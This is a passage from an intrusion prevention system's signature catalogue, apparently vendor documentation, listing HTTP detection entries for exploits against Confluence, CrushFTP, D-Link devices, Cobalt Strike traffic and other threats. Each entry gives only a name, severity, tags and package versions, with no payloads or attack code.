Tags: Any Operating System, Any Hardware, CMS Made Simple, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1075-5242
Last changed: sgpkg-ips-1503-5242
Vulnerability: CMS-Made-Simple-Login.php-Remote-Password-Reset-Vulnerability
Description:
Back to top

HTTP_CRL-CMS-Made-Simple-Smarty-Serverside-Template-Injection

About this situation: An attempt to exploit a vulnerability in CMS Made Simple
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, CMS Made Simple, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1333-5242
Last changed: sgpkg-ips-1333-5242
Vulnerability: CMS-Made-Simple-Smarty-Serverside-Template-Injection
Description:
Back to top

HTTP_CRL-Cobalt-Strike-C2-HTTP-Traffic

About this situation: Cobalt Strike C2 HTTP traffic was detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1373-5242
Last changed: sgpkg-ips-1373-5242
Vulnerability: Cobalt-Strike-C2-HTTP-Traffic
Description:
Back to top

HTTP_CRL-Cockpit-CMS-NoSQLi-To-RCE

About this situation: An attempt to exploit a vulnerability in Cockpit CMS detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Cockpit CMS, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1368-5242
Last changed: sgpkg-ips-1368-5242
Vulnerability: Cockpit-CMS-NoSQLi-To-RCE
Description:
Back to top

HTTP_CRL-Code-Red-II-Worm-Attack

About this situation: 'Code Red II' worm attack
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Windows 2000 SP0, Windows 2000 SP1, Windows 2000 SP2, Any Hardware, IIS 5.0, IIS 4.0, MS2001, CVE2001, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-7-1102
Last changed: sgpkg-ips-506-5211
Vulnerability: HTTP-Isapi-Extension-Buffer-Overflow
Description:
Back to top

HTTP_CRL-Code-Red-Worm-Attack

About this situation: 'Code Red' worm attack
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Windows 2000 SP0, Windows 2000 SP1, Windows 2000 SP2, Any Hardware, IIS 5.0, IIS 4.0, MS2001, CVE2001, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-7-1102
Last changed: sgpkg-ips-506-5211
Vulnerability: HTTP-Isapi-Extension-Buffer-Overflow
Description:
Back to top

HTTP_CRL-Cogent-Datahub-Web-Server-Getpermissions.asp-Command-Injection

About this situation: An attempt to exploit a vulnerability in Cogent DataHub detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Cogent DataHub, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-587-5211
Last changed: sgpkg-ips-587-5211
Vulnerability: Cogent-Datahub-Web-Server-Getpermissions.asp-Command-Injection
Description:
Back to top

HTTP_CRL-Commvault-Commcell-Downloadcenteruploadhandler-Arbitrary-File-Upload

About this situation: An attempt to exploit a vulnerability in Commvault CommCell detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Commvault CommCell, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1429-5242
Last changed: sgpkg-ips-1429-5242
Vulnerability: Commvault-Commcell-Downloadcenteruploadhandler-Arbitrary-File-Upload
Description:
Back to top

HTTP_CRL-Confluence-Access-Control-Vulnerability-CVE-2023-22515

About this situation: An attempt to exploit a vulnerability in Confluence Data Center and Server detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Confluence, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1640-5242
Last changed: sgpkg-ips-1642-5242
Vulnerability: Confluence-Access-Control-Vulnerability-CVE-2023-22515
Description:
Back to top

HTTP_CRL-Confluence-Hardcoded-Credentials-CVE-2022-26138

About this situation: An attempt to exploit a vulnerability in Confluence detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Confluence, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1502-5242
Last changed: sgpkg-ips-1502-5242
Vulnerability: Confluence-Hardcoded-Credentials-CVE-2022-26138
Description:
Back to top

HTTP_CRL-Confluence-OGNL-Injection-CVE-2021-26084

About this situation: An attempt to exploit a vulnerability in Confluence detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Confluence, CVE2021, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1383-5242
Last changed: sgpkg-ips-1637-5242
Vulnerability: Confluence-OGNL-Injection-CVE-2021-26084
Description:
Back to top

HTTP_CRL-Confluence-Path-Traversal-CVE-2019-3398

About this situation: An attempt to exploit a vulnerability in Confluence detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Confluence, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1304-5242
Last changed: sgpkg-ips-1305-5242
Vulnerability: Confluence-Path-Traversal-CVE-2019-3398
Description:
Back to top

HTTP_CRL-Confluence-Remote-Code-Execution-CVE-2019-3396

About this situation: An attempt to exploit a vulnerability in Confluence detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Confluence, CVE2019, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1151-5242
Last changed: sgpkg-ips-1151-5242
Vulnerability: Confluence-Remote-Code-Execution-CVE-2019-3396
Description:
Back to top

HTTP_CRL-Confluence-Template-Injection-CVE-2023-22527

About this situation: An attempt to exploit a vulnerability in Confluence detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Confluence, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1678-5242
Last changed: sgpkg-ips-1684-5242
Vulnerability: Confluence-Template-Injection-CVE-2023-22527
Description:
Back to top

HTTP_CRL-Connectwise-Screenconnect-Authentication-Bypass-CVE-2024-1709-New-Account

About this situation: An attempt to exploit a vulnerability in ConnectWise ScreenConnect detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, ConnectWise ScreenConnect, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1695-5242
Last changed: sgpkg-ips-1695-5242
Vulnerability: Connectwise-Screenconnect-Authentication-Bypass-CVE-2024-1709
Description:
Back to top

HTTP_CRL-ContentKeeper-Web-Remote-Command-Execution

About this situation: An attempt to exploit a ContentKeeper Web Remote Command Execution vulnerability detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, ContentKeeper, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-803-5242
Last changed: sgpkg-ips-1776-5242
Vulnerability: ContentKeeper-Web-Remote-Command-Execution
Description:
Back to top

HTTP_CRL-Cookie-Command-Execute

About this situation: Cookie with console commands detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-999-5242
Last changed: sgpkg-ips-999-5242
Description:
Back to top

HTTP_CRL-Coppermine-Photo-Gallery-picEditor.php-Command-Execution

About this situation: Coppermine Photo Gallery picEditor.php Command Execution Vulnerability
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Unix, Any Hardware, Coppermine Photo Gallery, CVE2008, Unix not specific, Suspected Disclosure, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-643-5211
Last changed: sgpkg-ips-926-5242
Vulnerability: Coppermine-Photo-Gallery-picEditor.php-Command-Execution
Description:
Back to top

HTTP_CRL-CPanel-Errorpage-Webcall-Id-Reflected-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in cPanel cPanel detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, cPanel, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1590-5242
Last changed: sgpkg-ips-1590-5242
Vulnerability: CPanel-Errorpage-Webcall-Id-Reflected-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-CPanel-Multiple-Cross-Site-Scripting-Vulnerabilities

About this situation: Detects suspicious requests to multiple scripts belonging to cPanel
Context: HTTP Normalized Request-Line
Severity: 2
Tags: Any Operating System, Any Hardware, cPanel, CVE2004, Any Operating System not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-1607-5242
Vulnerability: HTTP-CPanel-Multiple-Cross-Site-Scripting-Vulnerabilities
Description:
Back to top

HTTP_CRL-Craft-CMS-Unauthenticated-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Craft CMS detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Unix, Linux, Any Hardware, Craft CMS, CVE2023, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1730-5242
Last changed: sgpkg-ips-1730-5242
Vulnerability: Craft-CMS-Unauthenticated-Remote-Code-Execution
Description:
Back to top

HTTP_CRL-Cross-Site-Script-Encoder

About this situation: Generic XSS Encoder detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-787-5211
Last changed: sgpkg-ips-1396-5242
Vulnerability: Cross-Site-Script-Encoder
Description:
Back to top

HTTP_CRL-CrushFTP-Improper-Modification-Of-Object-Attributes-CVE-2023-43177

About this situation: An attempt to exploit a vulnerability in CrushFTP detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, CrushFTP, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1718-5242
Last changed: sgpkg-ips-1718-5242
Vulnerability: CrushFTP-Improper-Modification-Of-Object-Attributes-CVE-2023-43177
Description:
Back to top

HTTP_CRL-CrushFTP-Server-Side-Template-Injection-CVE-2024-4040

About this situation: An attempt to exploit a vulnerability in CrushFTP detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, CrushFTP, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1719-5242
Last changed: sgpkg-ips-1719-5242
Vulnerability: CrushFTP-Server-Side-Template-Injection-CVE-2024-4040
Description:
Back to top

HTTP_CRL-CryptoWall-Botnet-Traffic

About this situation: CryptoWall botnet traffic detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-650-5211
Last changed: sgpkg-ips-650-5211
Vulnerability: CryptoWall-Botnet
Description:
Back to top

HTTP_CRL-Crypttech-CryptoLog-Remote-Code-Execution

About this situation: An attempt to exploit a Crypttech CryptoLog Remote Code Execution vulnerability detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Crypttech, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-980-5242
Last changed: sgpkg-ips-980-5242
Vulnerability: Crypttech-CryptoLog-Remote-Code-Execution
Description:
Back to top

HTTP_CRL-Ctek-SkyRouter-Command-Execution

About this situation: An attempt to exploit a Ctek SkyRouter Command Execution vulnerability detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Ctek SkyRouter, CVE2011, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-710-5211
Last changed: sgpkg-ips-710-5211
Vulnerability: Ctek-SkyRouter-Command-Execution
Description:
Back to top

HTTP_CRL-Cyberpanel-Remote-Code-Execution-Via-completePath-Parameter-CVE-2024-51568

About this situation: An attempt to exploit a vulnerability in CyberPanel detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, CyberPanel, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1820-5242
Last changed: sgpkg-ips-1820-5242
Vulnerability: Cyberpanel-Remote-Code-Execution-Via-completePath-Parameter-CVE-2024-51568
Description:
Back to top

HTTP_CRL-Cyclope-Employee-Surveillance-Solution-SQL-Injection

About this situation: An attempt to exploit a Cyclope Employee Surveillance Solution SQL Injection vulnerability detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Cyclope Employee Surveillance Solution, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-803-5242
Last changed: sgpkg-ips-803-5242
Vulnerability: Cyclope-Employee-Surveillance-Solution-SQL-Injection
Description:
Back to top

HTTP_CRL-D-Link-Central-WiFiManager-SQL-Injection

About this situation: An attempt to exploit a vulnerability in D-Link Central WiFi Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, D-Link, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1338-5242
Last changed: sgpkg-ips-1338-5242
Vulnerability: D-Link-Central-WiFiManager-SQL-Injection
Description:
Back to top

HTTP_CRL-D-Link-Command-Injection-CVE-2019-16920

About this situation: An attempt to exploit a vulnerability in D-Link routers detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, D-Link, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1468-5242
Last changed: sgpkg-ips-1841-5242
Vulnerability: D-Link-Command-Injection-CVE-2019-16920
Description:
Back to top

HTTP_CRL-D-Link-D-View-Executewmiccmd-Command-Injection

About this situation: An attempt to exploit a vulnerability in D-Link D-View detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, D-Link D-View, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1734-5242
Last changed: sgpkg-ips-1734-5242
Vulnerability: D-Link-D-View-Executewmiccmd-Command-Injection
Description:
Back to top

HTTP_CRL-D-Link-DCS-930L-Command-Execution-CVE-2016-11021

About this situation: An attempt to exploit a vulnerability in D-Link DCS-930L detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, D-Link, CVE2016, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1485-5242
Last changed: sgpkg-ips-1485-5242
Vulnerability: D-Link-DCS-930L-Command-Execution-CVE-2016-11021
Description:
Back to top

HTTP_CRL-D-Link-DCS-931L-File-Upload

About this situation: An attempt to exploit a D-Link DCS-931L File Upload vulnerability detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, D-Link, CVE2015, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-768-5211
Last changed: sgpkg-ips-768-5211
Vulnerability: D-Link-DCS-931L-File-Upload
Description:
Back to top

HTTP_CRL-D-Link-ddns_check-Remote-Command-Execution-CVE-2021-45382

About this situation: An attempt to exploit a vulnerability in multiple D-Link routers detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, D-Link, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1468-5242
Last changed: sgpkg-ips-1468-5242
Vulnerability: D-Link-ddns_check-Remote-Command-Execution-CVE-2021-45382
Description:
Back to top

HTTP_CRL-D-Link-Devices-UPnP-Soap-Command-Execution

About this situation: An attempt to exploit a D-Link Devices UPnP Soap Command Execution vulnerability detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, D-Link, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-812-5242
Last changed: sgpkg-ips-812-5242
Vulnerability: D-Link-Devices-UPnP-Soap-Command-Execution
Description:
Back to top

HTTP_CRL-D-Link-DIR-2640-HNAP-EmailFrom-Command-Injection-Vulnerability

About this situation: An attempt to exploit a vulnerability in a D-Link DIR-2640 device detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, D-Link Systems DIR-2640, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1645-5242
Last changed: sgpkg-ips-1770-5242
Vulnerability: D-Link-DIR-2640-HNAP-EmailFrom-Command-Injection-Vulnerability
Description:
Back to top

HTTP_CRL-D-Link-Dir-605-Information-Disclosure-CVE-2021-40655

About this situation: An attempt to exploit a vulnerability in D-Link DIR-605 detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, D-Link, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1729-5242
Last changed: sgpkg-ips-1729-5242
Vulnerability: D-Link-Dir-605-Information-Disclosure-CVE-2021-40655
Description:
Back to top

HTTP_CRL-D-Link-DIR-615-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in D-Link DIR-615 router detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, D-Link DIR-615, CVE2009, Any Operating System not specific, Suspected Disclosure, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-608-5211
Vulnerability: D-Link-DIR-615-Authentication-Bypass
Description:
Back to top

HTTP_CRL-D-Link-DIR-816L-Getcfg.php-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in D-Link DIR-816L detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, D-Link, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1379-5242
Last changed: sgpkg-ips-1379-5242
Vulnerability: D-Link-DIR-816L-Getcfg.php-Information-Disclosure
Description:
Back to top

HTTP_CRL-D-Link-DIR-820L-Remote-Code-Execution-Vulnerability-CVE-2022-26258

About this situation: An attempt to exploit a vulnerability in D-Link DIR-820L detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, D-Link DIR-820L, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1589-5242
Last changed: sgpkg-ips-1589-5242
Vulnerability: D-Link-DIR-820L-Remote-Code-Execution-Vulnerability-CVE-2022-26258
Description:
Back to top

HTTP_CRL-D-Link-DIR-850L-Command-Execution

About this situation: A D-Link DIR-850L Command Execution vulnerability
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, D-Link, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1035-5242
Last changed: sgpkg-ips-1035-5242
Vulnerability: D-Link-DIR-850L-Command-Execution
Description:
Back to top

HTTP_CRL-D-Link-DIR-859-Path-Traversal-CVE-2024-0769

About this situation: An attempt to exploit a vulnerability in D-Link DIR-859 detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, D-Link, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1748-5242
Last changed: sgpkg-ips-1748-5242
Vulnerability: D-Link-DIR-859-Path-Traversal-CVE-2024-0769
Description:
Back to top

HTTP_CRL-D-Link-DIR816L-Moobot-Remote-Code-Execution-Attempt

About this situation: An attempt to exploit a vulnerability in D-Link DIR816L detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, D-Link, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1502-5242
Last changed: sgpkg-ips-1535-5242
Vulnerability: D-Link-DIR816L-Moobot-Remote-Code-Execution-Attempt
Description:
Back to top

HTTP_CRL-D-Link-DNS-320-Remote-Code-Execution-CVE-2020-25506

About this situation: An attempt to exploit a vulnerability in D-Link DNS-320 detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, D-Link, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1405-5242
Last changed: sgpkg-ips-1405-5242
Vulnerability: D-Link-DNS-320-Remote-Code-Execution-CVE-2020-25506
Description:
Back to top

HTTP_CRL-D-Link-DNS-320-ShareCenter-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in D-Link DNS-320 ShareCenter detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, D-Link DNS-320 ShareCenter, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1364-5242
Last changed: sgpkg-ips-1364-5242
Vulnerability: D-Link-DNS-320-ShareCenter-Remote-Code-Execution
Description:
Back to top

HTTP_CRL-D-Link-DNS-320-ShareCenter-Remote-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in D-Link DNS-320 ShareCenter detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, D-Link DNS-320 ShareCenter, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-608-5211
Vulnerability: D-Link-DNS-320-ShareCenter-Remote-Denial-Of-Service
Description:
Back to top

HTTP_CRL-D-Link-DNS-320-ShareCenter-Remote-Denial-Of-Service-2

About this situation: An attempt to exploit a vulnerability in D-Link DNS-320 ShareCenter detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, D-Link DNS-320 ShareCenter, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-1776-5242
Vulnerability: D-Link-DNS-320-ShareCenter-Remote-Denial-Of-Service
Description:
Back to top

HTTP_CRL-D-Link-DNS-320-ShareCenter-Remote-Denial-Of-Service-3

About this situation: An attempt to exploit a vulnerability in D-Link DNS-320 ShareCenter detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, D-Link DNS-320 ShareCenter, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-608-5211
Vulnerability: D-Link-DNS-320-ShareCenter-Remote-Denial-Of-Service
Description:
Back to top

HTTP_CRL-D-Link-DNS-320-ShareCenter-Remote-Denial-Of-Service-4

About this situation: An attempt to exploit a vulnerability in D-Link DNS-320 ShareCenter detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, D-Link DNS-320 ShareCenter, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-1776-5242
Vulnerability: D-Link-DNS-320-ShareCenter-Remote-Denial-Of-Service
Description:
Back to top

HTTP_CRL-D-Link-DnsProxy-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in D-Link DnsProxy detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, D-Link DnsProxy, CVE2015, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-714-5211
Last changed: sgpkg-ips-1014-5242
Vulnerability: D-Link-DnsProxy-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-D-Link-DSL-2760U-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in D-Link DSL-2760U detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, D-Link, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1594-5242
Last changed: sgpkg-ips-1594-5242
Vulnerability: D-Link-DSL-2760U-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-D-Link-NAS-Appliance-Command-Injection

About this situation: An attempt to exploit a vulnerability in D-Link NAS appliances
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, D-Link, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1799-5242
Last changed: sgpkg-ips-1799-5242
Vulnerability: D-Link-NAS-Appliance-Command-Injection
Description:
Back to top

HTTP_CRL-D-Link-soap.cgi-Command-Injection-CVE-2018-6530

About this situation: An attempt to exploit a vulnerability in D-Link detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, D-Link, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1503-5242
Last changed: sgpkg-ips-1503-5242
Vulnerability: D-Link-soap.cgi-Command-Injection-CVE-2018-6530
Description:
Back to top

HTTP_CRL-D-Link-TRENDnet-NCC-Service-Command-Injection

About this situation: An attempt to exploit a D-Link TRENDnet NCC Service Command Injection vulnerability detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, D-Link, CVE2015, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-740-5211
Last changed: sgpkg-ips-1822-5242
Vulnerability: D-Link-TRENDnet-NCC-Service-Command-Injection
D-Link-DIR-820L-Remote-Code-Execution-Vulnerability-CVE-2023-25280
Description:
Back to top

HTTP_CRL-D-Link-Unauthenticated-Remote-Command-Execution

About this situation: An attempt to exploit a D-Link Unauthenticated Remote Command Execution vulnerability detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, D-Link, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-803-5242
Last changed: sgpkg-ips-1381-5242
Vulnerability: D-Link-Unauthenticated-Remote-Command-Execution
Description:
Back to top

HTTP_CRL-D-Link-WBR-1310-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in D-Link WBR-1310 detected
Context: HTTP Normalized Request-Line
Severity: 7
